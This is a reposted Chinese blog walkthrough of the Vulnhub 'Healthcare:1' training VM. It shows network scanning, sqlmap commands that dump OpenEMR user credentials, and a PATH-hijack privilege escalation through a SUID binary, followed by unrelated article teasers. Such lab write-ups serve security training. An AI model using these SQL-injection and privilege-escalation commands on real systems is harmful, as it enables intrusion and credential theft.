看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1

news2024/12/23 12:32:17

Vulnhub靶机Healthcare:1渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
        • ①:信息收集:
        • ②:漏洞发现SQL注入:
        • ③:SQL注入漏洞利用:
        • ④:反弹Shell:
        • ⑤:环境变量提权:
    • ⑥:获取FLAG:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:需要获得root权限找到flag

Difficulty:Intermediate(中级的)

Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/healthcare/Healthcare.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。

在这里插入图片描述

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机
在这里插入图片描述

渗透机:kali IP :192.168.0.103 靶机IP :192.168.0.109

使用命令:nmap -sS -sV -n -T4 -p- 192.168.0.109

在这里插入图片描述
开启了8021端口 访问80 使用工具:dirb,dirsearch,gobuster 扫到了robots.txt 进行访问没有可以利用的信息!

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里换个字典directory-list-lowercase-2.3-big.txt(字典大有点慢)再扫一下发现一个新的目录 /openerm 进行访问

directory-list-lowercase-2.3-big.txt 字典下载:https://github.com/danielmiessler/SecLists

在这里插入图片描述

②:漏洞发现SQL注入:

这里是OpenEMRCMS 这里可以看到版本号 使用本地漏洞库搜一下看看searchsploit openemr 4.1.0 发现这里有SQL注入漏洞

在这里插入图片描述
我这里没更新没搜到 49742.py 这里修改url python运行即可 跑出数据库密码的hashMD5破解即可。

你这里我们就使用sqlmap 来跑 也一样的 反正有两种方法都可以尝试!

③:SQL注入漏洞利用:
sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= --dbs  --batch #列出数据库

在这里插入图片描述

sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= -D openemr  --tables   --batch #列出表

在这里插入图片描述

sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= -D openemr  -T users --columns  --batch #列出字段

在这里插入图片描述

sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= -D openemr -T users -C username,password --dump  --batch

在这里插入图片描述
得到两组账号密码: admin/ackbar medical/medical

④:反弹Shell:

在这里插入图片描述
在这里插入图片描述
获取第一个flag

在这里插入图片描述

⑤:环境变量提权:
find / -perm -u=s 2> /dev/null 

在这里插入图片描述
在这里插入图片描述

发现/usr/bin/healthcheck该文件会执行ifconfig 修改环境变量

echo "/bin/bash" > /tmp/ifconfig
chmod 777 /tmp/ifconfig
export PATH=/tmp:$PATH
/usr/bin/healthcheck

在这里插入图片描述

⑥:获取FLAG:

在这里插入图片描述

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集dirb,dirsearch,gobuster,nikto 工具得使用
2.环境变量提权,这个靶机比较简单没啥新得知识点!
3.sqlmap工具的使用 searchsploit搜索利用反弹shell的使用

🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1054444.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【开发篇】七、RedisTemplate与StringRedisTemplate + Jedis与Lettcus

文章目录 1、RedisTemplate详解2、常用方法3、关于IDEA的报黄4、RedisTemplate和StringRedisTemplate的区别5、如何通用RedisTemplate和StringRedisTemplate6、Jedis7、Jedis的连接池8、封装Jedis工具类8、RedisTemplate底层实现技术切换 1、RedisTemplate详解 RedisTemplate是…

基于Java的大学生社团管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录 前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序(小蔡coding)有保障的售后福利 代码参考源码获取 前言 💗博主介绍:✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作…

二十七、[进阶]MySQL默认存储引擎InnoDB的简单介绍

1、MySQL体系结构 MySQL大致可以分为连接层、服务层、引擎层、存储层四个层,这里需要注意,索引的结构操作是在存储引擎层完成的,所以不同的存储引擎,索引的结构是不一样的。 (1)体系结构示意图 &#xff0…

【数据结构】抽象数据类型

🦄个人主页:修修修也 🎏所属专栏:数据结构 ⚙️操作环境:Visual Studio 2022 目录 🎏数据类型 🎏抽象数据类型 结语 🎏数据类型 数据类型:是指一组性质相同的值的集合及定义在此集合上的一些操作的总称. 数据类型(d…

【vue3】自定义hook函数

假期第三篇&#xff0c;对于基础的知识点&#xff0c;我感觉自己还是很薄弱的。 趁着假期&#xff0c;再去复习一遍 【vue3 】hook函数 hook本质上是一个函数&#xff0c;把setup中使用的Composition API进行了封装 假设需求是获取当前点击时鼠标的坐标 <template><…

Pycharm操作git仓库 合并等

菜单 Git CommitPushUpdate ProjectPullFetchMergreRebase 查询 查询分支 查询本地所有分支 # 查询本地分支 git branch# 查询远程分支 git branch -rPycharm查看当前分支 步骤&#xff1a; Git->Branches 哈喽&#xff0c;大家好&#xff0c;我是[有勇气的牛排]&…

网络正常,微信正常登录,谷歌浏览器无法正常打开(100%解决)

背景&#xff1a; 笔记本电脑&#xff0c;操作系统&#xff1a;windows10&#xff0c;网络&#xff1a;wifi/或者有线连接。 谷歌浏览器&#xff1a;最新版本&#xff1a;115.0.5790.171 可以正常使用微信&#xff0c;无法使用谷歌浏览器打开对应的网址。 解决办法&#xff1a;…

Charles 抓包工具使用详细介绍

1 前言 1.1 介绍 Charles是一款强大的网络抓包工具&#xff0c;主要用于分析和调试网络流量。它适用于多种操作系统&#xff0c;包括 Windows、macOS和linux。 Chaels可以捕获 http和https协议的请求和响应&#xff0c;帮助开发人员和测试人员了解应用程序与服务器支架的通信…

【2023双非保研】信管跨保计算机大类的记录(东南、川大、重大、东北、西电、南理工、杭高院、河海、东华、天大等)

以此篇博客记录我的保研之旅 目录 一、个人情况 二、夏令营 1、国科大杭高院&#xff08;线下&#xff09; 2、南信工&#xff08;线下&#xff09; 3、华中师范&#xff08;线上or线下&#xff09; 4、浙大软件&#xff08;线上&#xff09; 5、东华大学&#xff08;线…

手机电脑数码小程序商城的作用是什么

手机几乎是每个成年人人手一个以上&#xff0c;市场非常大&#xff0c;加之产品更新迭代速度快&#xff0c;每年都会推出多个型号、造型等&#xff0c;因此对高收入群体或爱机人群来说&#xff0c;新手机往往一年或二年时间就会换&#xff0c;或者直接购买当备用机等。 每个城…

C++ 学习系列 -- std::stack 与 std::queue

一 std::stack 与 std::queue 分别是什么&#xff1f; 两者均是 c 中的序列化容器&#xff0c;区别在于&#xff1a; std::stack 元素是先进后出 std::queue 元素是先进先出 二 std::stack 与 std::queue 原理 1 std:statck 2. std::queue 两者底层容器可以是 list 也可以…

创建型设计模式 单例 工厂模式 看这一篇就够了

4&#xff0c;创建型模式 创建型模式的主要关注点是“怎样创建对象&#xff1f;”&#xff0c;它的主要特点是“将对象的创建与使用分离”。 这样可以降低系统的耦合度&#xff0c;使用者不需要关注对象的创建细节。 创建型模式分为&#xff1a; 单例模式工厂方法模式抽象工程模…

vue3简易文字验证码

大神勿喷&#xff0c;简易版本&#xff0c;demo中可以用一下。 需要几个文字自己codelen 赋值 灵活点直接父组件传过去&#xff0c;可以自己改造 首先创建一个生成数字的js **mathcode.js**function MathCode(num){let str "寻寻觅觅冷冷清清凄凄惨惨戚戚乍暖还寒时候…

LeetCode 热题 HOT 100:回溯专题

LeetCode 热题 HOT 100&#xff1a;https://leetcode.cn/problem-list/2cktkvj/ 文章目录 17. 电话号码的字母组合22. 括号生成39. 组合总和46. 全排列补充&#xff1a;47. 全排列 II &#xff08;待优化)78. 子集79. 单词搜索124. 二叉树中的最大路径和200. 岛屿数量437. 路径…

object-fit,object-position让img标签表现得像背景图那样能自适应和调整显示位置

文章目录 一、object-fit的用法二、object-position的用法 图片在网页中有2种表现形式&#xff0c;使用CSS的background-image或者HTML的img标签来实现。 背景图实现如notion的封面图效果可以使用background-position或者background-size轻松实现&#xff0c;首先来看看notion…

2023年安全员-C证证模拟考试题库及安全员-C证理论考试试题

题库来源&#xff1a;安全生产模拟考试一点通公众号小程序 2023年安全员-C证证模拟考试题库及安全员-C证理论考试试题是由安全生产模拟考试一点通提供&#xff0c;安全员-C证证模拟考试题库是根据安全员-C证最新版教材&#xff0c;安全员-C证大纲整理而成&#xff08;含2023年…

【Java 进阶篇】JDBC Statement:执行 SQL 语句的重要接口

在Java应用程序中&#xff0c;与数据库进行交互是一项常见的任务。为了执行数据库操作&#xff0c;我们需要使用JDBC&#xff08;Java Database Connectivity&#xff09;来建立与数据库的连接并执行SQL语句。Statement接口是JDBC中的一个重要接口&#xff0c;它用于执行SQL语句…

leetCode 376.摆动序列 贪心算法

如果连续数字之间的差严格地在正数和负数之间交替&#xff0c;则数字序列称为 摆动序列 。第一个差&#xff08;如果存在的话&#xff09;可能是正数或负数。仅有一个元素或者含两个不等元素的序列也视作摆动序列。 例如&#xff0c; [1, 7, 4, 9, 2, 5] 是一个 摆动序列 &…

AI智能问答系统源码/AI绘画商业系统/支持GPT联网提问/支持Midjourney绘画

一、AI创作系统 SparkAi创作系统是基于国外很火的ChatGPT进行开发的AI智能问答系统和AI绘画系统。本期针对源码系统整体测试下来非常完美&#xff0c;可以说SparkAi是目前国内一款的ChatGPT对接OpenAI软件系统。那么如何搭建部署AI创作ChatGPT&#xff1f;小编这里写一个详细图…

.360、.halo勒索病毒数据恢复|金蝶、用友、管家婆、OA、速达、ERP等软件数据库恢复

导言&#xff1a; 在网络犯罪的阴影下&#xff0c;.360和.halo勒索病毒显得格外神秘而危险&#xff0c;它们都属于BeijingCrypt勒索病毒家族旗下的病毒&#xff0c;两者加密特征一致&#xff0c;加密勒索信内容一致。本文91数据恢复将深度解析.360、.halo勒索病毒的内部机制&a…